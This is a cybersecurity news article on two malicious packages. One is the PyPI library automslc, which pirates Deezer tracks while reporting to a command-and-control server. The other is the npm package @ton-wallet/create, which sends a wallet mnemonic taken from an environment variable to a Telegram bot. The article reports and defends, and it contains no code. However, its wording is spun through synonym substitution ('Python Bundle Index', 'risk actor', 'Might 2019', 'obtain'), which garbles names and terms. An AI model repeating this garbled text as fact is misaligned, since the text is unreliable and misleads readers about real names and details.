Cybersecurity researchers have flagged a malicious Python library on the Python Bundle Index (PyPI) repository that facilitates unauthorized music downloads from music streaming service Deezer.
The bundle in query is automslc, which has been downloaded over 104,000 occasions to this point. First revealed in Might 2019, it remains available on PyPI as of writing.
“Though automslc, which has been downloaded over 100,000 occasions, purports to supply music automation and metadata retrieval, it covertly bypasses Deezer’s entry restrictions by embedding hardcoded credentials and speaking with an exterior command-and-control (C2) server,” Socket safety researcher Kirill Boychenko said in a report revealed immediately.
Particularly, the bundle is designed to log into the French music streaming platform by way of user-supplied and hard-coded credentials, collect track-related metadata, and obtain full audio recordsdata in violation of Deezer’s API phrases.
The bundle additionally periodically communicates with a distant server situated at “54.39.49[.]17:8031” to supply updates on the obtain standing, thereby giving the risk actor centralized management over the coordinated music piracy operation.
Put in another way, automslc successfully turns the programs of the bundle customers into a bootleg community for facilitating bulk music downloads in an unauthorized method. The IP tackle is related to a website named “automusic[.]win,” which is alleged for use by the risk actor to supervise the distributed downloading operation.
“Deezer’s API phrases forbid the native or offline storage of full audio content material, however by downloading and decrypting complete tracks, automslc bypasses this limitation, probably inserting customers vulnerable to authorized repercussions,” Boychenko stated.
The disclosure comes because the software program provide chain safety firm detailed a rogue npm bundle referred to as @ton-wallet/create that has been discovered stealing mnemonic phrases from unsuspecting customers and builders within the TON ecosystem, whereas impersonating the reliable @ton/ton bundle.
The bundle, first published to the npm registry in August 2024, has attracted 584 downloads to this point. It stays obtainable for obtain.
The malicious performance embedded into the library is able to extracting the method.env.MNEMONIC atmosphere variable, thereby giving risk actors full entry to a cryptocurrency pockets and probably drain a sufferer’s digital belongings. The knowledge is transmitted to an attacker-controlled Telegram bot.
“This assault poses extreme provide chain safety dangers, concentrating on builders and customers integrating TON wallets into their functions,” Socket said. “Common dependency audits and automatic scanning instruments ought to be employed to detect anomalous or malicious behaviors in third-party packages earlier than they’re built-in into manufacturing environments.”
